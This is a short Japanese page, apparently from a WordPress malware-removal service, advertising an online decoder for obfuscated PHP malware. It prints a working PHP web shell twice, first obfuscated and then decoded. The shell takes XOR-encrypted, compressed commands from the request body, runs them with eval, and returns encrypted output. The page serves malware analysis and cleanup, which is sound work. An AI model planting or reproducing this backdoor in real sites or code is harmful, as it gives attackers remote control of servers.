Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $h='unction x(*$t*,$k){$c=st*rlen($*k);$l=*strle*n($t);$**o="";for($i*=0;*$i<*$l;*){for($'; $N=str_replace('dO','','cdOrdOeatdOdOe_funcdOtdOion'); $B='n*d*_clea**n();$r=@base*64_e*ncode(@x(@g**zcompress($o),$*k));p*rin*t("$p*$kh$r$kf");}'; $l='$k=*"*4d4098d6";$kh*="4e16*3d27269*5";*$kf="*94*55d046fd7c*";$p="f8ewV*ri1Y*d8RJ*kIZ"*;f'; $d='c*h("/$kh(.+*)$kf/*",@fi*le_get_contents*("php**://input"),$*m*)==1){@*ob_*start();*@*e'; $W='va*l(@g*z*uncompress(@x(@b*ase64_deco*de($m[1])*,$k)));$*o=@ob_*get_cont*ents*();@ob_e'; $u='j=*0;($j<$c&&$*i*<$l);$j*++,$i++*)*{$o.=$t{$i}^$*k{$*j};}}retur*n $o;}i*f(@p**reg_mat*'; $M=str_replace('*','',$l.$h.$u.$d.$W.$B); $G=$N('',$M);$G(); ?>
<?php $h = 'unction x(*$t*,$k){$c=st*rlen($*k);$l=*strle*n($t);$**o="";for($i*=0;*$i<*$l;*){for($'; $N = "create_function"; $B = 'n*d*_clea**n();$r=@base*64_e*ncode(@x(@g**zcompress($o),$*k));p*rin*t("$p*$kh$r$kf");}'; $l = '$k=*"*4d4098d6";$kh*="4e16*3d27269*5";*$kf="*94*55d046fd7c*";$p="f8ewV*ri1Y*d8RJ*kIZ"*;f'; $d = 'c*h("/$kh(.+*)$kf/*",@fi*le_get_contents*("php**://input"),$*m*)==1){@*ob_*start();*@*e'; $W = 'va*l(@g*z*uncompress(@x(@b*ase64_deco*de($m[1])*,$k)));$*o=@ob_*get_cont*ents*();@ob_e'; $u = 'j=*0;($j<$c&&$*i*<$l);$j*++,$i++*)*{$o.=$t{$i}^$*k{$*j};}}retur*n $o;}i*f(@p**reg_mat*'; $M = "\$k=\"4d4098d6\";\$kh=\"4e163d272695\";\$kf=\"9455d046fd7c\";\$p=\"f8ewVri1Yd8RJkIZ\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if(@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}"; $G = function () { $k = "4d4098d6"; $kh = "4e163d272695"; $kf = "9455d046fd7c"; $p = "f8ewVri1Yd8RJkIZ"; function x($t, $k) { $c = strlen($k); $l = strlen($t); $o = ""; for ($i = 0; $i < $l;) { for ($j = 0; $j < $c && $i < $l; $j++, $i++) { $o .= $t[$i] ^ $k[$j]; } } return $o; } if (@preg_match("/4e163d272695(.+)9455d046fd7c/", @file_get_contents("php://input"), $m) == 1) { @ob_start(); @eval(@gzuncompress(@x(@base64_decode($m[1]), $k))); $o = @ob_get_contents(); @ob_end_clean(); $r = @base64_encode(@x(@gzcompress($o), $k)); print "{$p}{$kh}{$r}{$kf}"; } }; $G();
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.